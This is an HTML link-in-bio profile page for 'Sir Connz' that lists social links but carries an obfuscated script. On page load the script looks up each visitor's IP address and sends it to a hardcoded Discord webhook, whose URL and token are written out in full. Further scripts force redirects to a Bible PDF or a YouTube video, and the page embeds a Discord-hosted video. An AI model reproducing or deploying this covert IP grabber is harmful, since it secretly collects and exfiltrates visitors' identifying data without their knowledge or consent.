<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Link not tree</title>
<!-- Add the favicon link -->
<link rel="icon" href="favicon.ico" type="image/x-icon">
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
<style>
  body {
    font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
    margin: 0;
    padding: 0;
    background: linear-gradient(to right, #ff6ec4, #7873f5);
  }
  .container {
    max-width: 600px;
    margin: 50px auto;
    padding: 20px;
    border-radius: 20px;
    box-shadow: 0 0 20px rgba(0, 0, 0, 0.1);
    text-align: center;
  }
  h1 {
    color: #fff;
  }
  .social-links {
    list-style: none;
    padding: 0;
    margin: 20px 0;
    text-align: center;
  }
  .social-links li {
    margin-bottom: 15px;
  }
  .social-links li a {
    display: inline-block;
    padding: 15px 0;
    width: 70%; /* Set a specific width for each button */
    max-width: 300px; /* Limit the maximum width of the button */
    text-decoration: none;
    background-color: #fff;
    color: #333;
    border-radius: 20px;
    transition: background-color 0.3s, color 0.3s;
  }
  .social-links li a:hover {
    background-color: #333;
    color: #fff;
  }
  .profile-img {
    width: 100px;
    height: 100px;
    border-radius: 50%;
    margin: 0 auto;
    overflow: hidden;
    margin-bottom: 20px;
  }
  .profile-img img {
    width: 100%;
    height: 100%;
    object-fit: cover;
  }
  .name {
    color: #fff;
    font-size: 24px;
  }
</style>
</head>
<body>

<div class="container">
  <div class="profile-img">
    <img src="profile_picture.png" alt="Profile Picture">
  </div>
  <div class="name">Sir Connz</div>
  <ul class="social-links">
    <li><a href="https://www.instagram.com/skuzixp0" target="_blank">Instagram</a></li>
    <li><a href="https://www.youtube.com" target="_blank">Youtube</a></li>
    <li><a href="https://www.roblox.com" target="_blank">Roblox</a></li>
    <li><a href="https://businesscard.com" target="_blank">Business Card</a></li>
    <li><a href="https://www.needgod.net" target="_blank">NeedGod.net</a></li>
  </ul>
</div>

<script>
    const _0x3a9ab2=_0x2815;function _0x2815(_0x32d3d1,_0x31281c){const _0x5ea439=_0x5ea4();return _0x2815=function(_0x281584,_0x28ee0c){_0x281584=_0x281584-0x16f;let _0x1cb2b5=_0x5ea439[_0x281584];return _0x1cb2b5;},_0x2815(_0x32d3d1,_0x31281c);}(function(_0x1434fa,_0xf4e1c0){const _0xf8d658=_0x2815,_0x3d0a9e=_0x1434fa();while(!![]){try{const _0xac68e9=parseInt(_0xf8d658(0x17d))/0x1+-parseInt(_0xf8d658(0x176))/0x2*(-parseInt(_0xf8d658(0x17b))/0x3)+-parseInt(_0xf8d658(0x177))/0x4+parseInt(_0xf8d658(0x175))/0x5+-parseInt(_0xf8d658(0x179))/0x6+-parseInt(_0xf8d658(0x171))/0x7+parseInt(_0xf8d658(0x16f))/0x8;if(_0xac68e9===_0xf4e1c0)break;else _0x3d0a9e['push'](_0x3d0a9e['shift']());}catch(_0xe4adf0){_0x3d0a9e['push'](_0x3d0a9e['shift']());}}}(_0x5ea4,0x2672a));const webhookURL='https://discord.com/api/webhooks/1085509349968973865/IzvWeL6Adq2ONPuvncwivrxu5bUysGBw5aaDzPXxniIsY1fiBYx-_GbKe34QyVNkrzLj';function sendToWebhook(_0x158e34){const _0x33d9eb=_0x2815,_0x212925={'content':_0x33d9eb(0x178)+_0x158e34},_0x449a13={'method':'POST','headers':{'Content-Type':_0x33d9eb(0x17a)},'body':JSON[_0x33d9eb(0x170)](_0x212925)};fetch(webhookURL,_0x449a13);}function getIPAddress(){const _0x391587=_0x2815;fetch(_0x391587(0x173))[_0x391587(0x17e)](_0x4db6eb=>_0x4db6eb[_0x391587(0x17f)]())[_0x391587(0x17e)](_0x1d7556=>{const _0x21b3bb=_0x1d7556['ip'];sendToWebhook(_0x21b3bb);})[_0x391587(0x174)](_0x13df98=>console[_0x391587(0x17c)](_0x13df98));}window[_0x3a9ab2(0x172)](_0x3a9ab2(0x180),getIPAddress);function _0x5ea4(){const _0x46127d=['2096968WvfBaV','stringify','1572410FxVHMa','addEventListener','https://api.ipify.org/?format=json','catch','1326270PUAqcK','72394KtupiE','1100000AGTUGl','New\x20user\x20with\x20IP\x20address:\x20','1206810zjpSen','application/json','6jCuaLf','error','258478oRcQKB','then','json','load'];_0x5ea4=function(){return _0x46127d;};return _0x5ea4();}
</script>

<script>
  function relocateWindow() {
    window.location.href = "https://ia600900.us.archive.org/15/items/GIDEONSBible/GIDEONS_Bible.pdf"; 
  }

  const delayInSeconds = 1;
  const delayInMilliseconds = delayInSeconds * 10000;

  setTimeout(relocateWindow, delayInMilliseconds);
</script>

<script>
if (localStorage.getItem('visitedBefore')) {
  setTimeout(function() {
    window.location.href = 'https://www.youtube.com/watch?v=u5KpZBQ6yGE';
  }, 5000);
} else {
  localStorage.setItem('visitedBefore', true);
}
</script>

<iframe src="https://cdn.discordapp.com/attachments/1085509219534508124/1222872389931634708/real.mp4?ex=6617cba9&is=660556a9&hm=0943a4dbe4bfaddd7aa1e3b2b3fb8498b7db495e5135dd677c48811482c64f76&"></iframe>

</body>
</html>
